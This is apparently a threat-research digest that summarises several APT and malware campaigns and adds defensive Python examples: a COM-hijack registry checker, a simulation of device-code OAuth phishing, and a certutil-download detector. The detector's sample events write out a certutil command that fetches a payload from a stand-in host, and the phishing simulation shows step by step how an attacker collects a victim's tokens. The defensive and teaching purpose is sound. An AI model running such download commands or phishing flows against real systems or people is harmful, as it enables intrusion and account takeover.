Threat Research

    Pawn Storm, a Russia-aligned APT group, is targeting Ukraine’s defense supply chain and allied nations. It deploys PRISMEX, a modular malware suite that uses steganography, COM hijacking, and cloud-based C2. The group exploited multiple flaws, including a Windows zero-day (CVE-2026-21513); according to Akamai findings, malicious .lnk files exploiting CVE-2026-21509 may be chained with CVE-2026-21513....
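The COM hijacking mentioned above is a generic technique that a blue team can hunt for without any PRISMEX indicators: per-user CLSID registrations under HKCU\Software\Classes\CLSID are resolved before the machine-wide ones in HKLM, so a DLL registered there from a user-writable directory gets loaded by any process that instantiates that CLSID. The following is an added example (not PRISMEX code, and not a published detection for it) that parses a `reg export` file and flags such entries. The GUIDs, paths and .reg text are constructed sample input.

```python
"""COM hijack check over 'reg export' output.
Added example; the GUIDs and paths below are made up, not real indicators."""
import re

# Only the server registrations matter for hijacking: the default value is the DLL/EXE loaded.
KEY_RE = re.compile(
    r"^HKEY_(CURRENT_USER|LOCAL_MACHINE)\\Software\\Classes\\CLSID\\"
    r"(\{[0-9A-Fa-f-]{36}\})\\(InprocServer32|LocalServer32)$",
    re.IGNORECASE,
)
# Directories an unprivileged user can write to; a COM server living here is suspect.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\downloads\\")


def parse_reg_export(text):
    """Parse string values of a .reg (v5) export into {key_path: {value_name: value}}.
    Non-string data (dword:, hex:) is kept verbatim; it is not needed here."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        if current is None or "=" not in line:
            continue
        name, _, value = line.partition("=")
        name = "@" if name == "@" else name.strip('"')
        if value.startswith('"') and value.endswith('"'):
            # .reg escapes quotes and backslashes inside string data
            value = value[1:-1].replace('\\"', '"').replace("\\\\", "\\")
        keys[current][name] = value
    return keys


def find_com_hijacks(hkcu_text, hklm_text=""):
    """Return HKCU CLSID server entries that point into user-writable paths or
    shadow a machine-wide (HKLM) registration of the same CLSID."""
    hkcu, hklm = parse_reg_export(hkcu_text), parse_reg_export(hklm_text)
    machine_clsids = set()
    for key in hklm:
        m = KEY_RE.match(key)
        if m:
            machine_clsids.add(m.group(2).lower())
    findings = []
    for key, values in hkcu.items():
        m = KEY_RE.match(key)
        if not m or m.group(1).upper() != "CURRENT_USER":
            continue
        clsid, path = m.group(2).lower(), values.get("@", "")
        reasons = []
        if any(d in path.lower() for d in USER_WRITABLE):
            reasons.append("server path is user-writable")
        if clsid in machine_clsids:
            reasons.append("shadows an HKLM registration of the same CLSID")
        if reasons:
            findings.append({"clsid": clsid, "server": m.group(3), "path": path, "reasons": reasons})
    return findings


# Constructed sample exports in 'reg export' format (made-up GUIDs and paths).
SAMPLE_HKCU = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32]
@="C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\update.dll"
"ThreadingModel"="Apartment"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{66666666-7777-8888-9999-000000000000}\InprocServer32]
@="C:\\Program Files\\Vendor\\legit.dll"
'''

SAMPLE_HKLM = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32]
@="C:\\Windows\\System32\\shell32.dll"
'''

if __name__ == "__main__":
    for f in find_com_hijacks(SAMPLE_HKCU, SAMPLE_HKLM):
        print(f["clsid"], f["server"], f["path"], "; ".join(f["reasons"]))
```

On a live host the two inputs come from `reg export HKCU\Software\Classes\CLSID hkcu.reg` and `reg export HKLM\Software\Classes\CLSID hklm.reg` (the files are written as UTF-16, so open them with `encoding="utf-16"`). The shadowing check is the stronger signal: a per-user override of a CLSID that the machine already provides has few legitimate reasons to exist.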
    An active phishing campaign is impersonating a cloud file storage service and major e-signature platforms. Instead of stealing passwords, it abuses Microsoft’s legitimate Device Code OAuth flow: the attacker starts the flow, and the victim is tricked into entering the resulting verification code on Microsoft’s real login page. Once the victim approves, the attacker’s client receives the OAuth tokens, gaining persistent access to accounts and data....
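To make the three-party exchange concrete, here is an added example (not the campaign's tooling and not Microsoft's implementation) that simulates the RFC 8628 device authorization grant the campaign abuses. The in-memory server stands in for the identity provider's /devicecode and /token endpoints; the verification URL, client id, user name, scopes and token values are made up. The point it shows: the victim only ever interacts with the genuine login page, while the tokens are delivered to whoever holds the `device_code`, which is the attacker.

```python
"""Device-code phishing walkthrough (RFC 8628 device authorization grant).
Added example; endpoints, ids and tokens are stand-ins."""
import secrets


class DeviceCodeServer:
    """Minimal authorization server: issues code pairs, records approval, redeems tokens."""

    def __init__(self, lifetime_s=900, interval_s=5):
        self.lifetime_s, self.interval_s = lifetime_s, interval_s
        self._pending = {}       # device_code -> grant record
        self._by_user_code = {}  # user_code -> device_code

    def devicecode(self, client_id, scope, now):
        """Step 1: the attacker's client asks for a code pair. No victim is involved yet."""
        device_code = secrets.token_hex(16)
        user_code = "".join(secrets.choice("BCDFGHJKLMNPQRSTVWXZ") for _ in range(9))
        self._pending[device_code] = {"client_id": client_id, "scope": scope,
                                      "user_code": user_code, "expires_at": now + self.lifetime_s,
                                      "approved_by": None, "denied": False}
        self._by_user_code[user_code] = device_code
        return {"device_code": device_code, "user_code": user_code,
                "verification_uri": "https://login.example/device",  # stand-in for the real login page
                "expires_in": self.lifetime_s, "interval": self.interval_s}

    def user_enters_code(self, user_code, upn, now, approve=True):
        """Step 2: the victim, signed in on the genuine site, types the code from the lure."""
        device_code = self._by_user_code.get(user_code)
        if device_code is None or now > self._pending[device_code]["expires_at"]:
            return False
        rec = self._pending[device_code]
        if approve:
            rec["approved_by"] = upn
        else:
            rec["denied"] = True
        return True

    def token(self, client_id, device_code, now):
        """Step 3: the attacker polls /token; after approval the tokens go to the code's holder."""
        rec = self._pending.get(device_code)
        if rec is None or rec["client_id"] != client_id:
            return {"error": "invalid_grant"}
        if now > rec["expires_at"]:
            return {"error": "expired_token"}
        if rec["denied"]:
            return {"error": "access_denied"}
        if rec["approved_by"] is None:
            return {"error": "authorization_pending"}
        del self._pending[device_code]
        self._by_user_code.pop(rec["user_code"], None)
        return {"token_type": "Bearer", "scope": rec["scope"], "subject": rec["approved_by"],
                "access_token": "at-" + secrets.token_hex(8),
                "refresh_token": "rt-" + secrets.token_hex(8)}  # the refresh token is the persistence


def run_phish(victim_approves=True, victim_delay_s=60):
    """Drive the three steps with an explicit clock and return what the attacker observes."""
    server = DeviceCodeServer()
    attacker_client = "attacker-controlled-client-id"  # placeholder
    t0 = 1_000_000
    codes = server.devicecode(attacker_client, "openid offline_access Mail.Read", now=t0)
    # The lure carries only the genuine verification URL and the code: nothing for a URL filter to catch.
    lure = f"Open {codes['verification_uri']} and enter code {codes['user_code']} to view the document."
    first_poll = server.token(attacker_client, codes["device_code"], now=t0 + codes["interval"])
    server.user_enters_code(codes["user_code"], "victim@example.com", now=t0 + victim_delay_s,
                            approve=victim_approves)
    final = server.token(attacker_client, codes["device_code"], now=t0 + victim_delay_s + codes["interval"])
    return {"lure": lure, "first_poll": first_poll, "final": final}


def flag_device_code_signins(signins):
    """Detection hint: Entra ID sign-in records carry authenticationProtocol == 'deviceCode' for this grant."""
    return [s["userPrincipalName"] for s in signins if s.get("authenticationProtocol") == "deviceCode"]


# Constructed sample sign-in records (field names follow the Microsoft Graph signIn resource).
SAMPLE_SIGNINS = [
    {"userPrincipalName": "victim@example.com", "authenticationProtocol": "deviceCode", "ipAddress": "203.0.113.7"},
    {"userPrincipalName": "admin@example.com", "authenticationProtocol": "oAuth2", "ipAddress": "198.51.100.4"},
]

if __name__ == "__main__":
    result = run_phish()
    print(result["lure"])
    print("before approval:", result["first_poll"])
    print("after approval:", result["final"])
    print("device-code sign-ins to review:", flag_device_code_signins(SAMPLE_SIGNINS))
```

The time pressure in the lure is not cosmetic: the attacker's `device_code` expires on the server's clock, so the victim has to act within that window. Defensively, the sign-in log check above is the cheap first step; in Microsoft Entra ID, a Conditional Access policy using the "Authentication flows" condition can block the device code flow outright for users who have no reason to use it.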
    AVrecon malware has been used to compromise routers and IoT devices across more than 160 countries, enabling threat actors to convert infected systems into residential proxies. These compromised devices were sold through the SocksEscort service, which facilitated access to hundreds of thousands of infected endpoints since 2020....
    Researchers are tracking ongoing Contagious Interview campaign activity by NICKEL ALLEY, a North Korea–linked threat group. The group targets tech professionals using fake job postings and deceptive interview processes. Victims are tricked into downloading malware during these staged recruitment steps....
    DarkSword is a sophisticated iOS full-chain exploit leveraging multiple zero-day vulnerabilities to fully compromise devices running iOS 18.4 to 18.7. Since late 2025, it has been used by commercial surveillance vendors and state-sponsored actors across campaigns targeting regions including Saudi Arabia, Turkey, Malaysia, and Ukraine....
    The Coruna exploit kit is a sophisticated toolkit targeting Apple iPhones running iOS 13.0 through 17.2.1, containing five full exploit chains and 23 exploits, including zero-day exploits, that leverage advanced, non-public techniques to bypass iOS security protections....
    The intrusion started in mid-February 2024 when a threat actor exploited CVE-2023-46604 on an exposed Apache ActiveMQ server. By leveraging a Java Spring class (ClassPathXmlApplicationContext) and a custom Spring bean XML configuration, the attacker achieved remote code execution. The malicious XML executed a command that used Windows CertUtil to download a payload from a remote server....
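The CertUtil download is the observable that endpoint telemetry can catch regardless of how the broker was exploited. The following is an added example (not the report's own detection logic) that scores process-creation events: a `certutil -urlcache` fetch whose parent is the Java process running ActiveMQ is rated high, the same fetch from any other parent is rated low, and non-download uses of certutil are ignored. The events are constructed Sysmon-style records with field names following Event ID 1; the addresses are from the TEST-NET range.

```python
"""Process-creation detection for certutil downloads spawned by an ActiveMQ broker.
Added example; the events below are constructed, not from the incident."""
import ntpath
import shlex
from urllib.parse import urlparse

BROKER_IMAGES = {"java.exe", "javaw.exe", "wrapper.exe"}  # how ActiveMQ runs on Windows


def parse_certutil_download(command_line):
    """Return {'url', 'dest'} when the command line is a certutil URL fetch, else None.
    certutil accepts '-' and '/' switch prefixes, case-insensitively, with or without .exe."""
    try:
        argv = shlex.split(command_line, posix=False)  # keep Windows backslashes intact
    except ValueError:
        return None
    argv = [a.strip('"') for a in argv]
    if not argv or ntpath.basename(argv[0]).lower() not in ("certutil", "certutil.exe"):
        return None
    switches = {a[1:].lower() for a in argv[1:] if a[:1] in "-/"}
    if "urlcache" not in switches:
        return None
    urls = [a for a in argv[1:] if urlparse(a).scheme in ("http", "https")]
    if not urls:
        return None
    positional = [a for a in argv[1:] if a[:1] not in "-/"]
    i = positional.index(urls[0])
    dest = positional[i + 1] if i + 1 < len(positional) else None
    return {"url": urls[0], "dest": dest}


def classify(event):
    """Score one process-creation event; high when certutil fetches a URL under the broker."""
    dl = parse_certutil_download(event.get("CommandLine", ""))
    if dl is None:
        return None
    parent_img = ntpath.basename(event.get("ParentImage", "")).lower()
    parent_cmd = event.get("ParentCommandLine", "").lower()
    under_broker = parent_img in BROKER_IMAGES and "activemq" in parent_cmd
    return {
        "severity": "high" if under_broker else "low",
        "parent": parent_img,
        "url": dl["url"],
        "dest": dl["dest"],
        "note": ("certutil download spawned by the ActiveMQ broker process"
                 if under_broker else "certutil download from a non-broker parent"),
    }


def scan(events):
    """Run classify over a batch of events and keep only the hits."""
    return [r for r in (classify(e) for e in events) if r]


# Constructed sample telemetry (Sysmon Event ID 1 field names).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.10/update.exe C:\Windows\Temp\update.exe",
     "ParentImage": r"C:\Program Files\Java\jre\bin\java.exe",
     "ParentCommandLine": r'"C:\Program Files\Java\jre\bin\java.exe" -jar "C:\apache-activemq-5.18.2\bin\activemq.jar" start'},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -hashfile C:\Users\bob\setup.msi SHA256",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "ParentCommandLine": "cmd.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil /urlcache /f https://203.0.113.20/a.dat a.dat",
     "ParentImage": r"C:\Windows\explorer.exe",
     "ParentCommandLine": "explorer.exe"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["severity"].upper(), hit["parent"], "->", hit["url"], "=>", hit["dest"], "|", hit["note"])
```

The parent check is what separates this from a generic LOLBin rule: a broker process has no business spawning certutil at all, so the combination is close to a zero-false-positive signal, while certutil downloads under explorer.exe or cmd.exe still deserve a look but are routinely triggered by administrators.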
    Labs have uncovered targeted phishing campaigns in Taiwan that exploit local business workflows. The attacks deliver Winos 4.0 (ValleyRat) and additional malicious plugins through weaponized attachments and embedded links. Lures impersonate official communications, including tax audit notices, tax software installers, and cloud e-invoice downloads....
    The report "VShell and SparkRAT Observed in Exploitation of BeyondTrust Critical Vulnerability (CVE-2026-1731)" details active exploitation of a pre-authentication RCE flaw in BeyondTrust Remote Support software that lets attackers execute OS-level commands and fully compromise affected systems....
    Two critical zero-day vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM), CVE-2026-1281 and CVE-2026-1340, are being actively exploited in the wild against enterprise mobile fleets and corporate networks. Both flaws allow unauthenticated remote code execution on affected servers....